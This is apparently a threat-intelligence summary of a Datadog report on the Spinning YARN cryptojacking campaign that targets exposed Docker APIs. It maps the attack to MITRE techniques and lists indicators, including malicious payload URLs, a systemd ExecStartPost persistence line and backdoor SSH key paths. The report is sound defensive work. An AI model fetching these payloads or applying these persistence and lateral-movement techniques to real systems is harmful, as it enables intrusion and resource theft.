Threat Research

Attackers deploying new tactics in campaign targeting exposed Docker APIs | Datadog Security Labs

Cyware

Datadog Security Labs details a renewed Spinning YARN cryptojacking campaign targeting publicly exposed Docker Engine endpoints, introducing new payloads and persistence methods. The operation includes chkstart, exeremo, and vurl, expands with Go-based components, and relies on systemd and SSH-based techniques to maintain access and mine cryptocurrency. #SpinningYARN #DockerEngine #chkstart #exeremo #vurl #systemd #ExecStartPost #SSH #XMRig #DatadogSecurityLabs

Keypoints

  • The attackers behind Spinning YARN target publicly exposed Docker Engine hosts for initial access via the Docker API (port 2375).
  • The campaign introduces new payloads: chkstart (remote access), exeremo (lateral movement via SSH), and vurl (Go-based downloader).
  • A unique persistence mechanism is used by modifying existing systemd services and inserting ExecStartPost commands to execute malicious actions.
  • Initial access includes spawning an Alpine container that binds the host root and using chroot to pivot to the host filesystem.
  • The attackers deploy two downloader components named vurl; one shell-script-based and one Go-based binary with hardcoded C2 domains and a zzhbot user agent requirement.
  • Exeremo performs SSH-focused lateral movement, collecting usernames, hosts, and private keys to spread to additional SSH servers and launch s.sh to install further tools.
  • The campaign ultimately deploys an XMRig-based miner (top) to hijack computing resources, with mining pools and infrastructure referenced in the IOCs.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The campaign begins by targeting Docker API endpoints exposed on the internet. Quote: ‘Datadog Security Researchers recently encountered a new campaign that targets Docker API endpoints publicly exposed without authentication…’
  • [T1105] Ingress Tool Transfer – The downloader payloads are fetched from attacker infrastructure; Quote: ‘downloadFile function is used to download the previously-mentioned tar archive, m.tar — containing additional payloads — from the new array of hardcoded URLs.’
  • [T1543.003] Create or Modify Systemd Service – Persistence is achieved by modifying unit files and inserting ExecStartPost to execute a payload. Quote: ‘The malware abuses this feature by inserting the line ExecStartPost=/var/tmp/.222/top into the unit file.’
  • [T1053.003] Cron – Persistent download/execution is scheduled via cron entries in /etc/crontab and /etc/cron.d/zzh. Quote: ‘cron job is saved to /etc/crontab and /etc/cron.d/zzh.’
  • [T1021.004] SSH – Lateral Movement – Exeremo propagates via SSH and uses SSH to spread to adjacent hosts. Quote: ‘a lateral movement tool, used to propagate the malware via SSH.’
  • [T1496] Resource Hijacking – The top binary is a modified XMRig miner used to hijack host resources for cryptocurrency mining. Quote: ‘the malware uses it to mine the XMRig cryptocurrency.’
  • [T1556.004] SSH Authorized Keys – Attacker-provided SSH keys are installed to enable backdoor access. Quote: ‘The malware then proceeds to write an attacker-controlled key to /root/.ssh/authorized_keys and /root/.ssh/.ssh/zzhkeys.’

Indicators of Compromise

  • [IP Address] 64.19.222.131, 206.189.204.54, 107.189.7.84, 194.36.190.118 – public feeds used by campaign infrastructure.
  • [Domains/URLs] m.9-9-8.com, m.9-9-11.com, m.9-9-12.com, m.9-9-13.com, m.9-9-14.com, m.9-9-15.com, m.9-9-16.com, m.9-9-17.com, m.9-9-18.com, m.9-9-19.com, b.9-9-11.com, b.9-9-11.com/brysj/m/m.tar, b.9-9-11.com/brysj/d/ar.sh, b.9-9-11.com/brysj/d/ai.sh, b.9-9-12.com
  • [SHA256] 51de345f677f46595fc3bd747bfb61bc9ff130adcbec48f3401f8057c8702af9 (1.0.4.tar.gz), 12481d3fbcee0ed5aa8a9c8bc1aeb71bf9439cbddf68e8cd275c2a90b26ec0ad (ar.sh), 852a577b227aa856399ae836d9db15eee38a4f62301a8590f80a009ec29dad8a (b.sh), 2063e682e631fc28d77b50b32494edf2cf37bcc1e85c6d0302b34fa2e30aa52f (chkstart), 048a1fe62bcd51cbf91128012dc1c15f25b17133d241c25d6717c3caf766c1ec (exeremo), 7044f839aecd91bc5e4deac327d0b41fdae9a8238a9b64510ff336e49ed92e08 (fkoths), 0d508268b3f6d3b5396d5d182e546e59311af1d4ebe03a7728e2fd2a212c008b (m.tar), b6ddd29b0f74c8cfbe429320e7f83427f8db67e829164b67b73ebbdcd75d162d (p.tar), 32dfb086e6719c20666f151d17a3fbfcbccf559d0a8f1b2b888175f1a4d8f8a8 (s.sh), f3925aad20636a17be343ff473e6acb86345bc82c6611daa2154e24cd5e670e8 (sd), dcff5f9e748c915aeefce08991d924197aff7f2a0affda00bfb45cfa1919b641 (top), fdda14d3bc993960991ac6c95964514444e730f04b76d607df6e59087761648d (vurl), f53b8f70f6aeb478781e17ffd16a0fbbe5a5a08b4c4c0597091bc3407794ed1b (zgrab).
  • [Filepath] /usr/bin/vurl, /etc/crontab, /etc/cron.d/zzh, /var/tmp/.222, /root/.ssh/authorized_keys, /root/.ssh/.ssh/zzhkeys, /usr/lib/systemd/system/amazon-ssm-agent.service (modified), /var/tmp/.222/top (persistence)
  • [Filename] 1.0.4.tar.gz, ar.sh, b.sh, chkstart, exeremo, fkoths, m.tar, p.tar, s.sh, sd, top, vurl, zgrab

Read more: https://securitylabs.datadoghq.com/articles/attackers-deploying-new-tactics-in-campaign-targeting-exposed-docker-apis

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint